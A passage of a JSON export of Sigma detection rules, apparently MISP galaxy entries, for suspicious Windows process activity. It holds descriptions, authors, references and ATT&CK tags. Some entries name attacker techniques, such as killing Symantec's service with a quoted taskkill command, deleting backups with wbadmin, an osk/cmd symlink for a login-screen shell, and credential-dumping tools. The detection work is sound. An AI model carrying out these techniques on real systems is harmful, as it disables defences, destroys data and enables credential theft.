"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "114de787-4eb2-48cc-abdb-c0b449f93ea4", "value": "Suspicious X509Enrollment - Process Creation" }, { "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", "meta": { "author": "Nextron Systems, @Kostastsale", "creation_date": "2022-06-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sdiagnhost_susp_child.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1218" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", "value": "Sdiagnhost Calling Suspicious Child Process" }, { "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. 
This behavior could be indicative of potential defense evasion attempt during persistence", "meta": { "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "creation_date": "2023-04-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-", "https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1036.005", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "value": "Suspicious Scheduled Task Creation via Masqueraded XML File" }, { "description": "Detect usage of the \"driverquery\" utility. 
Which can be used to perform reconnaissance on installed drivers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate use by third party tools in order to investigate installed drivers" ], "filename": "proc_creation_win_driverquery_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "a20def93-0709-4eae-9bd2-31206e21e6b2", "value": "DriverQuery.EXE Execution" }, { "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "meta": { "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "creation_date": "2021-12-07", "falsepositive": [ "Administrator, hotline ask to user" ], "filename": "proc_creation_win_susp_network_command.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", 
"value": "Suspicious Network Command" }, { "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im ccSvcHst.exe /f command several times, thereby killing the process belonging to the service and thus shutting down the service.\n", "meta": { "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "creation_date": "2022-09-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_taskkill_sep.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.exploit-db.com/exploits/37525", "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a6713f6-3331-11ed-a261-0242ac120002", "value": "Taskkill Symantec Endpoint Protection" }, { "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-28", "falsepositive": [ "Legitimate piping of the password to anydesk", "Some FP could occur with similar tools that use the same command line '--set-password'" ], "filename": 
"proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", "value": "Remote Access Tool - AnyDesk Piped Password Via CLI" }, { "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", "meta": { "author": "frack113", "creation_date": "2022-08-20", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pua_webbrowserpassview.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_webbrowserpassview.yml" ], "tags": [ "attack.credential-access", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "value": "PUA - WebBrowserPassView Execution" }, { "description": "Detects the execution of the LaZagne. 
A utility used to retrieve multiple types of passwords stored on a local computer.\nLaZagne has been leveraged multiple times by threat actors in order to dump credentials.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-24", "falsepositive": [ "Some false positives are expected from tools with similar command line flags." ], "filename": "proc_creation_win_hktl_lazagne.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf", "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/", "https://github.com/AlessandroZ/LaZagne/tree/master", "https://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_lazagne.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "c2b86e67-b880-4eec-b045-50bc98ef4844", "value": "HackTool - LaZagne Execution" }, { "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", "meta": { "author": "Sittikorn S", "creation_date": "2021-06-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_scrcons_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/child-processes/", "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml" ], "tags": [ "attack.execution", 
"attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "value": "Script Event Consumer Spawning Process" }, { "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-01", "falsepositive": [ "Legitimate use by a software developer" ], "filename": "proc_creation_win_lolbin_wfc.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "value": "Use of Wfc.exe" }, { "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-10", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml" ], "tags": [ "attack.discovery", "attack.t1087.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" }, { "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_schtasks_delete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_delete.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "value": "Delete Important Scheduled Task" }, { "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", "meta": { "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "creation_date": "2022-05-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", "https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", "value": "HackTool - Jlaive In-Memory Assembly Execution" }, { "description": "Detects execution of javascript code using \"mshta.exe\".", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mshta_javascript.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.005" ] }, "related": [ { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", "value": "Suspicious JavaScript Execution Via Mshta.EXE" }, { "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "meta": { "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "creation_date": "2021-12-07", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_netsh_fw_rules_discovery.yml", "level": "low", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/netsh.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", "value": "Firewall Configuration Discovery Via Netsh.EXE" }, { "description": "Detects a method often used by ransomware, which combines \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. It is used, for example, to hide the file responsible for the initial infection", "meta": { "author": "Ilya Krestinichev", "creation_date": "2022-11-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"54786ddc-5b8a-11ed-9b6a-0242ac120002", "value": "Suspicious Ping/Del Command Combination" }, { "description": "Detects changes to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.\n", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-05-14", "falsepositive": [ "System administrator activities" ], "filename": "proc_creation_win_registry_special_accounts_hide_user.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/", "https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/", "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user.yml" ], "tags": [ "attack.t1564.002" ] }, "related": [ { "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ec9fb1b-e059-4489-9642-f270c207923d", "value": "Hiding User Account Via SpecialAccounts Registry Key - CommandLine" }, { "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "meta": { "author": "frack113", "creation_date": "2021-07-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "value": "Windows Defender Definition Files Removed" }, { "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", "meta": { "author": "frack113", "creation_date": "2022-12-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", "https://ss64.com/nt/mklink.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.008" ] }, "related": [ { "dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9b61244-893f-427c-b287-3e708f321c6b", "value": "Potential Privilege Escalation Using Symlink Between Osk and Cmd" }, { "description": "Detects when net.exe is called with a password in the command line", "meta": { 
"author": "Tim Shelton (HAWK.IO)", "creation_date": "2021-12-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_net_use_password_plaintext.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml" ], "tags": [ "attack.defense-evasion", "attack.initial-access", "attack.persistence", "attack.privilege-escalation", "attack.lateral-movement", "attack.t1021.002", "attack.t1078" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d4498716-1d52-438f-8084-4a603157d131", "value": "Password Provided In Command Line Of Net.EXE" }, { "description": "This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_crackmapexec_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml" ], "tags": [ "attack.execution", "attack.persistence", 
"attack.privilege-escalation", "attack.credential-access", "attack.discovery", "attack.t1047", "attack.t1053", "attack.t1059.003", "attack.t1059.001", "attack.t1110", "attack.t1201" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", "value": "HackTool - CrackMapExec Execution" }, { "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_open_command.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_open_command.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", "value": "Suspicious Reg Add Open Command" }, { "description": "Detects RunDLL32.exe spawning explorer.exe as a child process, which is very uncommon; Gamarue is often observed spawning the explorer.exe process in this unusual way", "meta": { "author": "elhoim, CD_ROM_", "creation_date": "2022-04-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_spawn_explorer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-november-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_spawn_explorer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "value": "RunDLL32 Spawning Explorer" }, { "description": "Detects the deletion of all backups or system state backups via \"wbadmin.exe\".\nThis technique is used by numerous ransomware families and actors.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wbadmin_delete_all_backups.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf", 
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", "https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_delete_all_backups.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "639c9081-f482-47d3-a0bd-ddee3d4ecd76", "value": "All Backups Deleted Via Wbadmin.EXE" }, { "description": "Detects the use of Advanced Port Scanner.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-18", "falsepositive": [ "Legitimate administrative use", "Tools with similar commandline (very rare)" ], "filename": "proc_creation_win_pua_advanced_port_scanner.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml" ], "tags": [ "attack.discovery", "attack.t1046", "attack.t1135" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", "value": "PUA - Advanced Port Scanner Execution" }, { "description": "Detects the execution of SecurityXploded Tools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-12-19", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_secutyxploded.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securityxploded.com/", "https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml" ], "tags": [ "attack.credential-access", "attack.t1555" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", "value": "HackTool - SecurityXploded Execution" }, { "description": "Detects browsers starting with the remote debugging flags. 
